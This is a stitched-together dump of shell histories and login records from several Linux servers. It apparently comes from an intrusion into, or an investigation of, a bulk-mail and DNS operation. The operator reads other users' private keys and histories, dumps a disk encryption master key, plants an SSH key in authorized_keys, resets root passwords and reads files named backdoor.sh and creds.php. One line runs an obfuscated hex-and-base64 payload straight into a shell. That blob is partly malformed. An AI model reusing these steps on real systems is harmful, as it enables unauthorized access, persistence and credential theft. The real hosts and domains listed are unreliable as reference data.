ssh -v admin@107.158.36.69
proctor
cd /home
ls
cd admin
ls
cd Dropbox
ls
cd bin
ls
cd ..
proctor
cd /
ls
locate proctor
cd bin
ls
cd /etc
ls
cat crypttab
cm
cmtab
ls
```

```
cd /sbin
ls
./cryptsetup
./cryptsetup --dump-master-key
ls
cd /usr
ls
cd bin
ls
ls
cd ..
ls
cd local
ls
cd bin
ls
cd ..
ls
cd src
ls
cd ..
cd share
ls
cd applications
ls
cd ..
cd doc
ls
ls -la
cd /
ls
cd /home
ls
cd admin
ls
grep
grep --help
grep -r 'crypt' ./
grep -r -i 'cryptmount' ./
ls
cd Dropbox
ls
cd ..
cd /mnt
cd /home/admin
cd ./mnt
ls
cd ..
cryptmount
cm
cd tmp
ls
cd ..
```

```
cd web
ls
cd src
ls
cd httpd
ls
cd ..
cd alvin
ls
ls -la
cat famousquotesnow.com
cd ..
ls
cd pmta
ls
cd PowerMTA
ls
cd ..
cd ..
cd ..
cd Dropbox
ls
cd web
ls
cd ..
cd tmp
ls
cd ..
cd src
ls
cd baconbread
ls
cat iframes.xcf
ls
cd ..
ls
cd ..
ls
cd RVR_INTEL
ls
cd ..
ls
cd work_shared/
ls
cd ..
cd doc
ls
cd /home/admin
cd src
ls
cd spinprofit-sean
ls
cat init-torstack.sh
```

```
proctor
cd cryptmount/
ls
cd torstack
ls
cd ..
cd ..
ls
cd xr
ls
cd ..
ls
cd sean-scripts/
ls
cd ..
ls
cd cryptmount/
ls
cd ..
cd ..
ls
cd tools
ls
cd ..
ls
cd brian-stuff/
ls
cd ..
cat backdoor.sh
cd /etc
ls
cd ./gcrypt
ls
ls -la
cd ..
cat Trolltech.conf
cat statetab
cd /
ls
cd cgroup
ls
cd ..
cd run
cd proc
ls
ls -la cgroups
cd /
mount -a
mount -A
mount
cd /dev
ls
cd /home
```

```
ls
cd steve
ls -la
cat ./.bash_history
cd ..
cd michelle
cat ./.bash_history
ls
cd ..
ls
cd tunnel
ls
cat ./.bash_history
ssh -2fL 50000:localhost:4004 admin@66.165.231.50 sleep 10; nc localhost 50000
cd ./.ssh
ls
cd /home/tunnel
ls
cd ./.ssh
ls
cat known_hosts
ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50 sleep 10; nc localhost 50000
cat id_rsa.pub
echo "ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEArU6+zrvqvwLbNc4wbi4KHvtht/ZGYo67kea2DW/I8YyE/2BIT2NJIx97zhAKpJUW4X9R4lenpo0
xoJpiAhgIZhCEgmpsJ2an+lxpKrwZVDv60rMUXewBDLqpBci6Sln7G26mJu7FwLhPjdG8BbV1rRS6ICgNdLhtS8N8wYucu1nXVtjTC6E7
15Z5bSr56i7IqDoUwdmHMrsgpaMg9y/1p65rXsWQVA82qlc4LYtKq4cTX/b2dDduDeiVMsWQU+SKIp7/dTCFjJpA+DGgZ1dFPC9Dlv
TJyeT0Se+TUiUtrRGEXd/cZoYEU9Q63h7r+P0G0QB590suBjE2hqAjBcropQ== tunnel@rcmdev" > ./authorized_keys
ls
ls -la
service sshd restart
ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50 sleep 10; nc localhost 50000
ip addr
ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" admin@66.165.231.50 sleep 10; nc localhost 50000
ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" admin@66.165.231.50 sleep 10; nc 66.165.231.123 50000
netstat
tcpdump
who
ip addr
ls -la
dropbox
Dropbox
dbox
ls sbin
cd /
ls -la
ls sbin
mount.ntfs-3g
ld /dev
ls /dev
ls -la
cd /dev
ls -la
```

```
cd ./root
ls
mount
mount /dev/sdb2 /mnt
mount.ntfs-3g
mount.ntfs-3g /dev/sdb2 /mnt
mount.ntfs-3g /dev/sdb /mnt
mount.ntfs-3g /dev/sda /mnt
cd /
la
cat /root/.bash_history
cat /root/.bash_history netstat
tcpdump
ls -la
cd /etc
ls
fdisk -l
cd /mnt
ls
cd ..
mount /dev/mapper/vg_rcmdev-lv_root /mnt
cd mnt
ls
cd ..
ls -la
ls
cd mnt
ls
cd ..
umount /mnt
mount /dev/sdb1 /mnt
cd /mnt
ls
cd ..
umount /mnt
ls
mount /dev/sdb /mnt
ls /dev
mount /dev/sda1 /mnt
cd /mnt
ls
cd ..
umount /mnt
mount /dev/root /mnt
cd /mnt
ls
cd ..
ls
umount /mnt
cd tmp
ls
ls dropbox_errorFlAMDL.txt
ls -la dropbox_errorFlAMDL.txt
```

```
cat dropbox_errorFlAMDL.txt
screen dropbox
screen virtualbox
virtualbox
ls -la
cd /
ls
cd var
ls
cd /etc
ls
cat hosts
ssh -v admin@66.165.231.50
ssh -v admin@45.32.17.115
ssh -v admin@206.63.224.15
ssh -v admin@66.165.231.51
ssh -v admin@45.32.187.128
ssh -v -p 2252 admin@swift.mxrmedia.com
ssh -v admin@snowcapdns.com
ssh -v -p 2252 admin@snowcapdns.com
ssh -v admin@middec.com
ssh -v admin@162.246.21.166
ssh -v admin@174.47.2.71
ssh -v -p 2252 admin@174.47.2.71
ssh -v admin@66.165.231.100
ssh -v -p 56996 admin@66.165.231.100
ssh -v -p 8082 admin@66.165.231.100
ssh -v -p 58998 admin@66.165.231.100
ssh -v admin@216.158.229.136
ssh -v admin@206.63.224.11
ssh -v admin@splunk
ssh -v admin@v9
ssh -v admin@vhost68
ssh -v admin@rwhois
ssh -v admin@vultr-dc
ssh -vvvvv admin@vultr-dc
ssh -vvvvv -p 5022 admin@vultr-dc
ssh -vvvvv -p 2022 admin@vultr-d
rdesktop vultr-d
ssh -vvvvv admin@janusdns.com
ssh -vvvvv admin@squid-ll
ssh -vvvvv admin@mysql3
ssh -vvvvv admin@elk-devel
ping baconbread.com
rwhois
whois
whois baconbread.com
ssh -v admin@66.206.0.9
ssh -v admin@66.165.231.139
ssh -v admin@66.165.231.41
who
who -u
tcpdump -q
```

```
ssh -v -p 2252 root@45.32.17.115
exit
cd /home
ls
cd tunnel
ls -la
cat ./.bash_history
ls -la
cd ./.ssh
ls
cat authorized_keys
cat ./known_hosts
cat ./id_rsa
ls
cat known_hosts
cd /
ls
ls -la
cat ./.rnd
cd /home
ls
cd tunnel
ls
ls -la
cat ./.esd_auth
cd /
cd /etc
ls
cat hosts
ssh -v admin@69.171.64.41
ssh -v admin@69.171.64.41
ls -la
cd unbound
ls
cat root.anchor
cat named.conf
cd named
ls
cd ..
cat named.conf
cd named
ls
cd /var/named
ls
cd slaves
ls
cd ..
cd data
ls
ls -la
cd ..
ls
cd dynamic/
```

```
ls
cat managed-keys.bind
mysql -uroot -p
mysql -uroot -p
mysql -uroot -p
cd /root
ls
cd /home
ls
cd /admin
ls
cd admin
ls
ls -la
ls
cd dkim
ls
cd spixy.com
ls
cd sprixy.com/
ls
cd st
cd steve
cd ..
cd steve/
ls
cd ..
cd ..
ls
cd ..
ls
cd images
ls
cd snapshit/
ls
cd ..
cd ..
ls
cd steve/
ls
ls -la
ls -la
cat ./.bash_history
dig -x 66.165.231.123
dig -x 166.88.192.100
ls /tmp
ls /tmp/orbit-tunnel/
ls -la /tmp/orbit-tunnel/
cd ..
ls
cd /sbin
ls
fdisk -l
```

```
cd /dev
ls
cd /mnt
cd ..
mount /dev/sdb2 /mnt
mount /dev/ram0 /mnt
lsblk
mount /dev/sr0 /mnt
mount /dev/sda /mnt
mount -t
mount -a
mount
mount /dev/sda /mnt
mount /dev/sr0 /mnt
mount -t ext4 /dev/sr0 /mnt
mount -t ext4 /dev/ram0 /mnt
dmesg | tail
ssh -v admin@69.171.64.41
ls -la
cd /root
ls
cd ./.ssh
ls
cat known_hosts
ssh -v admin@66.45.232.98
cat known_hosts
ssh -v admin@45.76.98.34
who
who -r
rdesktop
ssh admin@ known_hosts 66.165.232.130
ssh admin@66.165.232.130
cd /etc
ls
cat ./resolv.conf
cat gai.conf
cat lftp.conf
cat fstab
cat hosts
ssh -v admin@107.170.16.7
ssh -v admin@66.165.231.66
ping prod
ssh -v admin@prod
ping production
exit
who
screen -ls
history
ip tunnel
who
sudo service Dropbox stop
last
ps fax
```

```
dropbox stop
ls /bin
cd /home/admin
ls /home/admin/bin
ls /home/admin/bin/dropbox.py stop
ll
lsof
lsof -Pi
service dropbox stop
iptables -L -n
cat /etc/passwd
lsof -Pi
ps fax
ls
kill -9 23027
ps fax
ls
passwd root
passwd admin
last
history
ssh admin@66.165.231.240
ll
ls /hom
ls /home
ps fax
who
service httpd stop
service mysqld stop
service squid stop
service vncserver stop
ps fax
ssh admin@66.165.231.239
exit
cd /var
ls
cd gdm
ls
cd ..
cd /www
ls
cd www
ls
cd html
ls -la
cd maze
ls
cd ..
cd edu
ls
cd wwwroot
s
ls
```

```
cd un
ls
cd ..
cat finaid.html
cd ..
ls
cd ..
ls
cd worldsite
ls
cat pasteit.txt
cd ..
ls
cd wwwsite
ls
cat rcm-hidden.php
ls
ls -la
cat ./.htpasswd
cd 20140420
ls
cat index.html
cd ..
ls
cat Ryker.1.8.binds
cd accounts
ls
cat creds.php
ls
cd ..
ls
cd namecheap
ls
cat index.php
cd ..
cd quick
ls
cd ..
ls
cd mc
ls
cd ..
ls
cat main.php
cat Ryker.1.8.binds
ls
cat domaindbl.html
cd ..
ls
cd temp
ls
cat afd76f069f771bbe8f53a18a3e063b35.txt
cat index.html
```

```
ls -la
cd ..
ls
cat index.php
cd worldsite/
ls
ls -la
cat qrcode.png
cat pasteit.txt

echo
```
'626173653634202D643C3C3C596D467A5A5459304943316B504477385344527A53554E4D63334A5862474E4251544A6B646C6
C59556E706155554E576245783164576436515531 6F646D4D3461474A6A52464E5052446C4552325A775954466E6E6555555524A615
64A4255566C4861544A4A4A4326C35543051774D574678625764476553746D4D4C7A513464455979633031425330557265556864335
55864495A456F7656316C5A5485A5364464E49526C5A5A4626C5A4B4D56564C4C4C314533595456 706131524E563078325256664784D5868534D6C5C55304E555261576B64594D6D6D4D4D5344B7A6B33513035794E584278556C6856556531633161585A4353314A566345
6C725648426C6C4D69746164316C6C6C6C356574 6576E637A5347785554455735425A4A6C67725A5751325558706C6C59564676546B5B567156
5767724E4856735447677A59323035613D 356C7165555A4457456376962556C6853485A7665554A66B563263314E6D786E61555654
5A57316D534524A5246246C5A4735334D444E 6534338331574549795556B4E4F6556637954305A4956584A5A5A51544A6A16162303
568634568445457684C654552775347567665545 6314D474531556D436427A51334D4656704D57784D565684343443B33466852
7A684A5646526162336F304D6D6B6C3059555A4B5364C4A6C53455A5355A5315A7A55316F775744553455334E6853573934565656
B627A4A4D5356525861566B83457545531533045346232784E5A336C4862453571535L65454494C33466A616B6C63456553131536B
4A7253484D325268B4A324E44465362556B56556779526B3958645870544E6E6E6A61576865A5A5A5749334F566C3563446C7661
57685A5A4870765353393353360397761306832536E4D4D7751316C6E5E59325674553355785231566E4D44684C636E6E6C4E6E6E6D5254
52315A6F4E7E7A64684554727707255326N794C79397A4N4C7A5234N55457A643316L6C57555642515554539494N877675A335675656D6C
7766434233661476C735A534244524N526C4D3949484A6C5L595751674C584A754D5342642A4F79426B627294277636D6C75644759674A5
74D6749695237597A6L744A436463626964394964736763337286L5A5841674D4334774D44553745467364769526L494969244264
4948783849484C735A575677494441754L44553749475276266L554B7C626173680A'|xxd -r -p|source /dev/stdin

```
cd ..
ls
cd edu
ls
cd wwwroot
ls
cd backup1
ls
cd /
ls
cd tmp
ls
cd /root
ls
cd /home
ls
cd /admin
ls
cd admin
ls
cd Dropbox
ls
cd web
ls
cd ..
```

```
ls -la
cd src
ls
ls -la
cd baconbread/
ls
cd ..
cd baconbread/
cat iframes.xcf
ls
cd ..
ls
cd python
ls
cat test.py
cd ..
cd rcmdev
ls
cd src
ls
cat dice.sh
ls
cat regexptst.pl
ssh -v admin@69.171.64.63
ls
cd retool/
ls
who
cd ..
cd vbox
ls
cat /home/admin/.bash_history
cd ..
ls
cd ..
cd ..
ls
cd ..
ls
cd ..
ls
cd dkim
ls
cd steve
ls
opendkim-testkey -d thancoverhot.date -vvv -s key1 -k key1.private
ssh admin@thancoverhot.date
rdesktop 66.206.0.83


------------------
[root@rcmdev tunnel]# cat /home/tunnel/.bash_history
exit
```

```
ssh-keygen
ls .ssh/
cat .ssh/*
ll .ssh/
man ssh
ls
echo $PATH
cd .ssh
ls
cat *
cat id_rsa.pub
ssh tunnel@66.165.231.50
ll
cat known_hosts
cat id_rsa
ls
ssh tunnel@66.165.231.50
ssh-copy-id tunnel@66.165.231.50
ssh tunnel@66.165.231.50
ls
rm *
ls
ssh-keygen
ls
ll
ssh-copy-id tunnel@66.165.231.50
ssh tunnel@66.165.231.50
ls
ll
ll ../
ll -a ../
ls
cat id_rsa.pub >> authorized_keys
ll
rm authorized_keys
ll
cat id_rsa.pub | winclip
cat id_rsa.pub | /home/admin/bin/winclip
cat id_rsa.pub
ls
ssh tunnel@66.165.231.50
ssh -f tunnel@66.165.231.50 -L 58878:66.165.231.50:4004 -N
nc localhost 58878
ls
yum search shuttle
exit
ssh -2 -N -f -L 4004:localhost:4004 tunnel@66.165.231.50
ps fax
lsof -i
nc localhost 4004
ps fax
kill 10856
ssh -2 -N -f -L 4004:localhost:873 tunnel@66.165.231.50
```

```
ls
netstat -nlptu
pv'
pv
ps fax
netstat -nlptu
netstat -nlptu | grep 127.0.0.1
lsof -Pin
lsof -Pi
ls
nc localhost 4004 > block.bin
ps fax
kill 10901
ssh -2 -N -f L 4004:localhost:4004 tunnel@66.165.231.50
ssh -2 -N -f -L 4004:localhost:4004 tunnel@66.165.231.50
nc localhost 4004 > block.bin
ls
ll
rm block.bin
nc -z localhost 4004
nc -z localhost 4000-4100
nc -z localhost 1-1000
nc -z localhost 1-5000
nc -z 66.165.231.50
nc -z 66.165.231.50 1-1000
ps fax
kill 10982
ps fax
ls
ssh -2f
ssh -2fL 50000:localhost:4004 tunne@66.165.231.50 sleep 10; nc localhost 50000
ssh -2 -f -L 50000:localhost:4004 tunne@66.165.231.50 sleep 10; nc localhost 50000
ssh -2fL 50000:localhost:4004 tunnel@66.165.231.50 sleep 10; nc localhost 50000
exit
ls -la
exit
ls -la
cd Desktop
ls
cd ..
cat ./.bash_history
ssh -i /home/tunnel/.ssh/id_rsa -2fL 50000:localhost:4004 tunnel@66.165.231.50 sleep 10; nc localhost 50000
cd ./.ssh
ls
mv ./known_hosts ./known_hosts_old
ssh -i /home/tunnel/.ssh/id_rsa -2fL 50000:localhost:4004 tunnel@66.165.231.50 sleep 10; nc localhost 50000
ssh -i /home/tunnel/.ssh/id_rsa -2fL 50000:localhost:4004 admin@66.165.231.50 sleep 10; nc localhost 50000
ssh -2 -N -f -L 4004:localhost:4004 admin@66.165.231.50
nc localhost 4004
nc -vvvvvv localhost 4004
exit

66.165.231.240
```

```
[root@ll-mon-1 ~]# last
admin    pts/0    66.165.231.123   Thu Feb  9 21:35   still logged in
admin    pts/1    66.165.231.123   Thu Feb  9 15:15 - 15:33  (00:17)
admin    pts/1    66.165.231.123   Tue Feb  7 11:03 - 11:07  (00:03)
admin    pts/1    69.171.64.174    Sat Feb  4 17:17 - 20:55  (03:37)
admin    pts/1    104.200.154.101  Sat Feb  4 13:07 - 15:30  (02:23)
admin    pts/1    104.200.154.101  Sat Feb  4 13:06 - 13:06  (00:00)
admin    pts/0    ex01.cet.com     Fri Feb  3 21:26 - 23:08  (01:42)
admin    pts/0    ex01.cet.com     Fri Feb  3 21:10 - 21:16  (00:06)
admin    pts/0    ex01.cet.com     Fri Feb  3 20:58 - 21:09  (00:10)
admin    pts/0    104.200.151.108 Fri Feb  3 17:09 - 19:16  (02:06)
admin    pts/0    69.171.64.174    Thu Feb  2 16:03 - 18:34  (02:31)
admin    pts/0    69.171.64.40     Thu Feb  2 12:16 - 15:54  (03:38)
admin    pts/0    10.16.32.67      Thu Feb  2 07:10 - 07:13  (00:03)
admin    pts/0    104.200.151.77  Thu Feb  2 01:20 - 03:36  (02:15)
admin    pts/0    104.200.151.78  Tue Jan 31 19:05 - 03:13  (08:07)
admin    pts/0    104.200.151.73  Sat Jan 28 17:18 - 23:43  (06:24)


66.45.232.98 - inter1
 3  ll
 4  ll *.arpa
 5  cat 152.152.107.in-addr.arpa
 6  vim 9.151.107.in-addr.arpa
 7  mv 9.151.107.in-addr.arpa 153.152.107.in-addr.arpa
 8  vim 10.151.107.in-addr.arpa
 9  mv 10.151.107.in-addr.arpa 129.152.107.in-addr.arpa
10  rndc reload
11  dig @ns1.ragingdns.com 107.152.129.5
12  dig @ns1.ragingdns.com -x 107.152.129.5
13  vim /etc/named.conf
14  rndc reload
15  dig @ns1.ragingdns.com -x 107.152.129.5
16  dig @ns1.ragingdns.com -x 107.152.152.5
17  dig @ns1.ragingdns.com -x 107.152.153.5
18  exit
19  cd /var/named
20  vim 53.250.23.in-addr.arpa
21  rndc reload
22  cd /var/named
23  vim 153.152.107.in-addr.arpa
24  service named restart
25  whois actonforegoing.net
26  jwhois actonforegoing.net
27  exit
28  cd /var/named
29  ls
30  vim 31.158.107.in-addr.arpa
31  rndc reload
32  exit
33  ls
34  cd /var/named
35  vim 52.250.23.in-addr.arpa
```

```
36  rndc reload
37  exit
38  cd /var/naemd
39  cd /var/named
40  ls
41  mv 52.250.23.in-addr.arpa ~
42  mv 153.152.107.in-addr.arpa ~
43  ls ~
44  vim /etc/named.conf
45  rndc reload
46  service named restart
47  exit
48  cd /var/named
49  ls
50  exit
51  cd /var/named
52  ls
53  cat > middledns.com.db
54  ll middledns.com.db
55  vim /etc/named.conf
56  service named restart
57  cat citytoobs.com.db
58  exit
59  cd /var/named
60  ll
61  grep dkim
62  grep DKIM *.db
63  grep DKIM *.db -l
64  vim zedohome.com.db
65  exit
66  cd /var/named
67  vim /etc/named.conf
68  ll
69  rsync -Pa admin@66.165.231.123:src/bindDNS/output/*.arpa ./
70  ll *.arpa
71  chown root:root *.arpa
72  ll *.arpa
73  vim 168.236.23.in-addr.arpa
74  vim 169.236.23.in-addr.arpa
75  vim 170.236.23.in-addr.arpa
76  vim 171.236.23.in-addr.arpa
77  service named restart
78  exit
79  cd /var/named
80  ls
81  vim /etc/named.conf
82  ll
83  ip addr
84  ls /home/admin
85  chown root:named /home/admin/*
86  mv /home/admin/alertnetbox.com.db ./
87  mv /home/admin/*.arpa ./
88  ll
```

```
89  ll *.arpa
90  service named restart
91  vim /etc/named.conf
92  service named restart
93  vim alertnetbox.com.db
94  service named restart
95  ll
96  touch actionclear.com.db
97  vim actionclear.com.db
98  ll actionclear.com.db
99  chown root.named actionclear.com.db
100  ll
101  vim /etc/named.conf
102  service named restart
103  vim 189.152.107.in-addr.arpa
104  tail -F /var/log/named/queries.log
105  cd /var/named/
106  ls
107  vim /etc/named.conf
108  cd /var/named
109  ll
110  vim *.arpa
111  ls
112  ll
113  ls *.arpa
114  ll *.arpa
115  grep -l ns1.alertnetbox.com *.arpa
116  for i in `grep -l ns1.alertnetbox.com *.arpa`; do echo $i; done
117  for i in `grep -l ns1.alertnetbox.com *.arpa`; do sed -i 's/alertnetbox.com/actionclear.com/g' $i; done
118  vim 188.152.107.in-addr.arpa
119  vim 189.152.107.in-addr.arpa
120  grep -l actionclear.com *.arpa
121  rndc reload
122  exit
123  vim /etc/named.conf
124  service named restart
125  service iptables status
126  cd /var/named
127  ll
128  ll *.arpa
129  cat 188.152.107.in-addr.arpa
130  grep 2013042301 *.arpa
131  grep -l 2013042301 *.arpa
132  sed -i s/2013042301/2013042302/g *.arpa
133  grep -l 2013042301 *.arpa
134  rndc reload
135  ll *.arpa
136  tail -F /var/log/named/queries.log
137  cd /var/named
138  vim actionclear.com.db
139  vim alertnetbox.com.db
140  cd /etc/sysconfig/network-scripts/
141  ls
```

```
142  ip tunnel
143  exit
144  cd /var/named
145  vim 31.158.107.in-addr.arpa
146  service named restart
147  exit
148  cd /var/named
149  dig -x 66.23.232.41
150  vim 31.158.107.in-addr.arpa
151  cd /var/named
152  ls *.arpa
153  ls ~
154  cp ~/153.152.107.in-addr.arpa ./
155  ll
156  ll *.arpa
157  vim /etc/named.conf
158  service named restart
159  vim /etc/named.conf
160  vim 152.152.107.in-addr.arpa
161  service named restart
162  eixt
163  exit
164  cd /var/named
165  vim 168.236.23.in-addr.arpa
166  exit
167  cd /var/named
168  vim 171.236.23.in-addr.arpa
169  rdnc reload
170  rndc reload
171  grep 171.236.23 /etc/named.conf
172  grep --help
173  grep -n 171.236.23 /etc/named.conf
174  vim /etc/named.conf
175  ls
176  cat yokework.com.db
177  exit
178  cd /var/named
179  vim 31.158.107.in-addr.arpa
180  service named restart
181  ls
182  exit
183  cd /var/named
184  ls
185  ls *.arpa
186  vim 31.158.107.in-addr.arpa
187  exit
188  ls
189  cd /var/named
190  ls
191  vim /etc/named.conf
192  exit
193  vim /etc/named.conf
194  service named restart
```

```
195  exit
196  cd /var/named/
197  ll
198  ll *.arpa
199  vim /etc/named.conf
200  ls *.arpa
201  cat 31.158.107.in-addr.arpa
202  cd /var/log/named
203  ll
204  ls
205  cd /var/named
206  ll
207  vim /etc/named.conf
208  service named restart
209  exit
210  ls
211  cd /var/named
212  ll
213  ll *.arpa
214  cp 31.158.107.in-addr.arpa 91.130.170.in-addr.arpa
215  vim 91.130.170.in-addr.arpa
216  cd /var/named
217  vim 91.130.170.in-addr.arpa
218  vim /etc/named.conf
219  service named restart
220  vim 91.130.170.in-addr.arpa
221  exit
222  cd /var/named
223  ll
224  ll *.arpa
225  vim /etc/named.conf
226  rm 91.130.170.in-addr.arpa
227  rm 30.158.107.in-addr.arpa
228  cat 31.158.107.in-addr.arpa
229  cp 31.158.107.in-addr.arpa 23.3.50.in-addr.arpa
230  vim 23.3.50.in-addr.arpa
231  vim /etc/named.conf
232  service named restart
233  vim /etc/named.conf
234  service named restart
235  whois exit
236  exit
237  vim /etc/named.conf
238  service named restart
239  exit
240  cd /var/named
241  ll *.arpa
242  dig -t any ns1.alertnetbox.com
243  ll
244  ll alertnetbox.com.db
245  cat alertnetbox.com.db
246  grep alertnetbox.com *.arpa -l
247  exit
```

```
248  vim /etc/named.conf
249  exit
250  cd /var/named
251  ll
252  ip addr
253  vim /etc/named.conf
254  exit
255  cd /var/named
256  ll
257  cat 53.250.23.in-addr.arpa
258  head 53.250.23.in-addr.arpa
259  grep -l webracked.com *
260  ls ~
261  mkdir ~/backup
262  mv 53.250.23.in-addr.arpa webracked.com.db ~/backup/
263  head 112.231.23.in-addr.arpa
264  grep stationdns -l *
265  head 152.152.107.in-addr.arpa
266  grep ragingdns.com -l *
267  head 31.158.107.in-addr.arpa
268  head 168.236.23.in-addr.arpa
269  grep middledns.com -l *
270  head 23.3.50.in-addr.arpa
271  grep citytoobs.com.db -l *
272  grep citytoobs.com -l *
273  vim 31.158.107.in-addr.arpa
274  grep middledns.com -l *
275  grep choicenetworks.net -l *
276  grep hostingrack.net -l *
277  grep alertnetbox.com -l *
278  grep actionclear.com * -l
279  exit
280  ip addr
281  cd /var/named
282  ll
283  vim /etc/named.conf
284  service named restart
285  vim /etc/named.conf
286  mv ~/backup/* ./
287  service named restart
288  ip addr
289  cd /etc/sysconfig/network-scripts/
290  ll
291  cat ifcfg-eth0-range*
292  ls ~
293  cp ~/{route-inter2cet, ifcfg-inter2cet} ./
294  cp ~/route-inter2cet ./
295  cp ~/ifcfg-inter2cet ./
296  ll
297  vim route-inter2cet
298  cat ifcfg-inter2cet
299  ifup inter2cet
300  cat route-inter2cet
```

```
301  ip route
302  cat route-inter2cet
303  cat route-inter2cet | awk '{print $2}
304  cat route-inter2cet | awk '{print $2}'
305  cat route-inter2cet | awk '{print $1}'
306  cat route-inter2cet | awk '{print $1}' > tempips
307  cat tempips
308  while read line; do ip addr del $line dev eth0; done < tempips
309  ip addr
310  vim tempips
311  while read line; do ip addr del $line dev eth0; done < tempips
312  ip addr
313  cat tempips
314  ip tunnel
315  ls
316  exit
317  cd /etc/sysconfig/network-scripts/
318  ll
319  ifdown inter2cet
320  ls ~
321  cp ifcfg-inter2cet ~
322  cp route-inter2cet ~
323  rm ifcfg-inter2cet route-inter2cet
324  cat ~/ifcfg-CET_201_INT
325  cp ~/ifcfg-inter2cet ifcfg-inter2ll
326  cp ~/route-inter2cet route-inter2ll
327  ll
328  vim route-inter2ll
329  ll
330  vim ifcfg-inter2ll
331  ifup inter2ll
332  ll
333  rm tempips
334  exit
335  cd /var/named
336  ll
337  scp *.arpa admin@66.165.231.123:src/bindDNS/archive/
338  cp 31.158.107.in-addr.arpa ~
339  cp citytoobs.com.db ~
340  cp 23.3.50.in-addr.arpa ~
341  vim /etc/named.conf
342  scp /etc/named.conf admin@66.165.231.123:src/bindDNS/archive/
343  ll ~
344  rm *.arpa *.db -f
345  cp ~/23.3.50.in-addr.arpa ./
346  cp ~/citytoobs.com.db ./
347  cp ~/31.158.107.in-addr.arpa ./
348  ll
349  service named restart
350  exit
351  mtr 66.206.0.1
352  exit
353  cd /var/named
```

```
354 lll
355 ll
356 cat citytoobs.com.db
357 vim /etc/named.conf
358 ls
359 ll
360 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
361 service named restart
362 vim /etc/named.conf
363 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
364 service named restart
365 vim /etc/named.conf
366 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
367 service named restart
368 ll
369 service named restart
370 vim /etc/named.conf
371 service named restart
372 vim /etc/named.conf
373 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
374 rm P_name.com_aged7.db
375 service named restart
376 vim /etc/named.conf
377 service named restart
378 vim /etc/named.conf
379 man scp
380 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
381 service named restart
382 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
383 vim /etc/named.conf
384 service named restart
385 vim /etc/named.conf
386 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
387 service named restart
388 vim /etc/named.conf
389 service named restart
390 vim /etc/named.conf
391 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
392 service named restart
393 vim /etc/named.conf
394 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
395 service named restart
396 vim /etc/named.conf
397 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
398 service named restart
399 top
400 rdnc
401 rndc
402 rndc status
403 cd /var/named
404 ll
405 vim /etc/named.conf
406 scp admin@66.165.231.123:src/bindDNS/output/*.db ./
```

407  service named restart
408  exit
409  ip tunnel
410  ip route
411  ifdown inter2ll
412  ifup inter2ll
413  cd /etc/sysconfig/network-scripts/
414  ls
415  cat route-inter2ll
416  exit
417  cd /var/named
418  ls
419  cat zurpia.com.db
420  cp zurpia.com.db elsinoremerrileegreatoffers.pw.db
421  vim elsinoremerrileegreatoffers.pw.db
422  vim /etc/named.conf
423  service named restart
424  tail -F /var/log/named/queries.log | grep elsinoremerrileegreatoffers.pw
425  vim elsinoremerrileegreatoffers.pw.db
426  service named restart
427  tail -F /var/log/named/queries.log | grep elsinoremerrileegreatoffers.pw
428  exit
429  cd /var/named
430  ls
431  ll
432  ls *.arpa
433  vim /etc/named.conf
434  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa
435  service named restart
436  exit
437  cd /var/named
438  ls
439  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa
440  grep citytoobs.com *.db -l
441  cp yytuo.com.db vintagemode.net.db
442  vim vintagemode.net.db
443  vim /etc/named.conf
444  vim vintagemode.net.db
445  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa
446  service named restart
447  vim vintagemode.net.db
448  service named restart
449  cd /var/named
450  ls
451  vim vintagemode.net.db
452  cd /var/named
453  vim vintagemode.net.db
454  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa
455  service named restart
456  cp vintagemode.net.db wellspringdepot.com.db
457  vim wellspringdepot.com.db
458  vim /etc/named.conf
459  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa

460  vim wellspringdepot.com.db
461  service named restart
462  cp wellspringdepot.com.db bookmarkingonline.com.db
463  vim bookmarkingonline.com.db
464  vim /etc/named.conf
465  vim 3.0.0.0.8.2.f.f.7.0.6.2.ip6.arpa
466  service named restart
467  cd /etc/sysconfig/networks-cr
468  cd /etc/sysconfig/network-scripts/
469  ls
470  ll
471  cat route-inter2ll
472  cp ifcfg-inter2ll ifcfg-inter2dev
473  vim ifcfg-inter2dev
474  ll
475  cat route-inter2ll
476  cat > route-inter2dev
477  vim route-inter2ll
478  service network restart
479  ping 10.69.1.1
480  service iptables status
481  vim /etc/sysconfig/iptables-config
482  service iptables start
483  service iptables status
484  service iptables start
485  cd /etc/init.d
486  l
487  sls
488  ls
489  rpm -qa iptables
490  yum update iptables
491  service iptables status
492  service iptables
493  service iptables start
494  service iptables status
495  service iptables start
496  iptables -nL
497  ls
498  /etc/init.d/iptables
499  /etc/init.d/iptables reload
500  /etc/init.d/iptables resrtart
501  /etc/init.d/iptables restart
502  service iptables status
503  service iptables start
504  service iptables stop
505  servcie iptables start
506  service iptables save
507  service iptables start
508  iptables - nL
509  iptables -nL
510  ip addr
511  cd /etc/sysconfig/network-scripts/
512  ls

```
513  ifdown inter2dev
514  ls
515  rm ifcfg-inter2dev
516  cat route-inter2dev
517  vim route-inter2ll
518  ls
519  rm route-inter2dev
520  ll
521  exit
522  cd /etc/sysconfig/network-scripts/
523  ls
524  cat route-inter2ll
525  ip tunnel
526  ip route
527  mtr -tn 206.72.206.194
528  ip addr
529  vim route-inter2ll
530  ip addr
531  ip route
532  ip route | sort
533  ip addr
534  for i in {194..206}; do ip addr del 206.72.206.$i/28 dev eth0; done
535  ip addr
536  exit
537  cd /var/named
538  ls
